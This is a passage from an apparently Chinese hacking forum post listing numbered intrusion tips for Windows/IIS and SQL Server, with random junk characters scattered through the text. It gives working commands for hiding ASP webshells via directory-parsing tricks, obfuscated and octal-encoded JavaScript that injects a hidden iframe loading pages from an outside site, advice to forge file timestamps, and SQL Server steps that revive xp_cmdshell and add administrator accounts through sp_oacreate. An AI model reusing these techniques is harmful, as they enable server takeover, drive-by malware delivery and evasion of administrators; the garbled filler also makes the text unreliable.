/ d5 f6 L3 v5 n" n" d* K; b S, v用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, j+ R7 M/ r7 @4 f' b
/ h1 _2 Y5 [* f& b4 S$ o/ A) y
53、隐藏ASP后门的两种方法8 z. \9 ~1 Y2 d0 s0 E) ?" i7 N+ n
1、建立非标准目录:mkdir images..\
' w+ b' T" k! Y. ]2 @拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp$ u/ I! L" ?) v" t
通过web访问ASP木马:http://ip/images../news.asp?action=login$ I, G6 t7 j% U6 t
如何删除非标准目录:rmdir images..\ /s
7 e+ @4 c! _* P7 A# z6 W) A0 l2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: o" Q' N' @" P7 smkdir programme.asp
- U3 `9 \) _/ i7 f" K新建1.txt文件内容:<!--#include file=”12.jpg”-->1 h& J- J w7 V- ], |
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# G" l# q) m( i% V9 F
attrib +H +S programme.asp
! W) B% _/ { E; E3 l通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt B) e3 b4 A' B( |* u5 e) p* a
! ~& X* b$ k, b8 B' z
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。. T0 v. Q. I( w3 ~1 h
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: P3 B$ U0 w9 S- @/ Y( ^, D/ A
2 ?) w) M$ l& q# |1 `7 ?8 ~55、JS隐蔽挂马* l6 `# R2 y. ]6 X
1.) a6 k9 e8 X8 f! k; d6 D+ u' {
var tr4c3="<iframe src=ht";
6 F. B- {& k9 s8 [" qtr4c3 = tr4c3+"tp:/";& z$ Q. ~4 e0 W2 N! ?
tr4c3 = tr4c3+"/ww";
1 z# O# [# ?2 G4 V w; ctr4c3 = tr4c3+"w.tr4";1 Z8 {! N U7 |1 J" Q
tr4c3 = tr4c3+"c3.com/inc/m";
/ e3 I3 G7 W. s3 r6 |tr4c3 = tr4c3+"m.htm style="display:none"></i";: Q, o5 l% t0 o h: r
tr4c3 =tr4c3+"frame>'";/ N5 t6 K1 Z# H) g8 H! `7 y
document.write(tr4c3);
$ a F* G3 F* B避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 H& A# U% ^: J7 R6 k
$ x1 q( ~3 A* ~" p& u2.# W) s; l- x! t0 E1 R- j' s
转换进制,然后用EVAL执行。如" H/ _" g6 z8 {
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
! [: h) A& H# M6 D4 X不过这个有点显眼。
% s4 G+ W# u% }9 j% M3.
4 u5 Y8 k) o% S( D" C0 @6 }document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; c' v- P4 k! k" l5 z+ F最后一点,别忘了把文件的时间也修改下。
% T+ B, h3 H, l$ B( M2 H8 X5 r6 }0 o ^- f
56.3389终端入侵常用DOS命令& }8 f! |$ @! X( V
taskkill taskkill /PID 1248 /t0 o+ a7 _% y9 ^8 ~! O
$ U% _3 d3 C# ~% r) p
tasklist 查进程
+ r5 [2 a6 E/ t3 @; N5 c5 t. p3 R7 }4 m2 R6 r. ^' B- D0 D/ l
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 I2 @) |7 e# \iisreset /reboot5 B# d c4 O" c; m3 q
tsshutdn /reboot /delay:1 重起服务器
* N; `0 l1 Y6 x2 ]0 M; I; F6 y9 O( B7 v* e# ~( y- ?7 N$ I& W7 n
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,0 ~. l% n8 a* E, Z1 P" _/ Z) s
& |9 H0 j5 S2 {+ Nquery user 查看当前终端用户在线情况/ U% ~6 Z; o$ ]* Q0 }3 |
, @$ P! W' c) w- ] X要显示有关所有会话使用的进程的信息,请键入:query process *$ C1 h$ v5 ?( O$ h1 e5 {8 C, B
. _5 W1 u, D6 ^ G要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:22 F8 I* b: Y" U3 N( D
& m2 o& B% ~; w6 U, X9 t0 G要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
. Q$ Z/ D7 {1 E: m3 F# d. W9 |9 x
. N6 Y6 S. Y: U0 x' n) p* n3 ^要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 J0 q+ l' ^- [; s+ v8 b
' f9 O6 G% n/ m/ u1 G命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
' P' J4 S9 @9 G' ?/ y5 b' L0 P( E1 F+ D" E9 f
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统& C0 b! _8 U9 L1 {; o( o) F
0 a6 m% g9 e1 a, R" Z5 Q [$ k8 v命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 h: {5 H$ Q F c) n4 t1 w0 t. @2 X) e/ l$ a0 D r9 P$ J$ c( {5 I, o
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# O: g* w0 p# g- _( L
# q$ z+ t4 \( y56、在地址栏或按Ctrl+O,输入:
& c* R2 H6 u) Cjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;3 z8 W* R! m2 h9 i
t* J C5 G$ H, m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。, b' N3 @+ j8 Z$ M3 p, N0 `, c8 S
' Z) t" f" r- {! }1 a9 F9 Y* [' ]* {57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' Y( e$ x6 N/ _3 y' s7 F用net localgroup administrators是可以看到管理组下,加了$的用户的。
) G5 t4 P$ T7 C; b! O3 U8 q7 f% f& A; N
58、 sa弱口令相关命令
0 u8 R- V8 E2 s# a! o+ x1 }. |& b2 A- I/ ]* k; I+ o1 T
一.更改sa口令方法:
- m. K# @/ }' k+ ~& V/ X3 P用sql综合利用工具连接后,执行命令:
2 U7 r+ R% C7 m `) c4 {; Yexec sp_password NULL,'20001001','sa'
& m) u- h+ c( F; e7 X(提示:慎用!)
5 C; G- K B9 ?# ?0 `+ y6 b6 H. n& I/ z9 z
二.简单修补sa弱口令.( D; P" y% g5 H9 s+ Z* J! ]
6 C1 n. w* A. j方法1:查询分离器连接后执行:7 e% Y9 _% i6 y0 ]
if exists (select * from3 r8 h2 u" h) u/ ]% _
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and) N8 ?5 C* _. X/ P- I; H) B c
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' [" @( f* Z: R
/ D7 W9 @ ~3 n3 S$ S- iexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 K; [9 f" Q6 B
) i d" s; s3 r+ o
GO/ t( c3 N; L b4 i2 n
4 L* J- L0 E4 B, S6 c然后按F5键命令执行完毕! H4 ]+ i# |8 C& d' K$ h
8 W8 L) n0 l& ?9 s方法2:查询分离器连接后; g. ]( q' @: C! q z
第一步执行:use master& J1 m0 w. f' E" h9 B# s4 @; i
第二步执行:sp_dropextendedproc 'xp_cmdshell': A) ?. q& } t8 G W3 X
然后按F5键命令执行完毕
- h* L$ A# R1 [% c* K, J) w/ Z l" H# u& V/ g
% N: u, S: R2 O: m" @
三.常见情况恢复执行xp_cmdshell.
8 m# N2 D7 D2 ]
4 D' |( Q N; B; {& ^ a0 ~# \: \- x" `1 K7 {" S" ]
1 未能找到存储过程'master..xpcmdshell'.
+ L' U* L5 G& ^, C: i 恢复方法:查询分离器连接后,
2 j' Z- \/ ~8 }% B* X第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 Q6 `6 h8 v( V
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 k8 J$ G- C/ R1 E0 D+ Z$ A
然后按F5键命令执行完毕; U g4 W' E5 d! S
# V6 I: D9 w* U0 J2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)5 f' a# y5 x5 p6 L* H
恢复方法:查询分离器连接后,
; R9 E3 ^! j. q0 v( J+ P第一步执行:sp_dropextendedproc "xp_cmdshell"# r$ ~. O0 Z% R/ f% Y0 `* M. g% s( j
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# e" s+ W' ?1 D& D& s6 G x
然后按F5键命令执行完毕
+ S" {4 c3 v; e+ N& a6 t; l
' t# h) \0 `+ I& @6 X3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)' n4 g; L9 c: \, w! H9 d4 n
恢复方法:查询分离器连接后,
( z2 i9 ^3 }7 `8 J: W第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 u) O" }* t6 t0 q3 q
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' $ w' C: _4 I1 G) m
然后按F5键命令执行完毕4 d4 u4 ]8 `/ z% N
2 U4 T n( Z6 P+ R- c# {; `2 X* f9 N四.终极方法.
* u* X- d7 Y: D6 u如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:1 I6 y& j( g K3 w" U
查询分离器连接后,
" x8 k0 I2 s. j6 l; _( @; N- A2000servser系统:
* r- I1 I) K/ kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( `3 w: x) A9 [* x/ I0 q
! g. g7 }+ B2 i: x7 C& w* G6 c6 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) z; H. J5 B7 [) r5 a
# o9 w2 J! G( F0 Y- S* Axp或2003server系统:; }6 R. O9 ?& Z3 v1 ~ V
/ f6 }' O3 W7 g* L) _! \: s7 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
! @" o% F9 J1 Z+ T& U
5 m; o1 T% F& k7 a, |7 Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 q0 U* V) e9 v# A" {, G3 |5 y
|
发表于 2012-9-15 14:13:15
收藏
支持
反对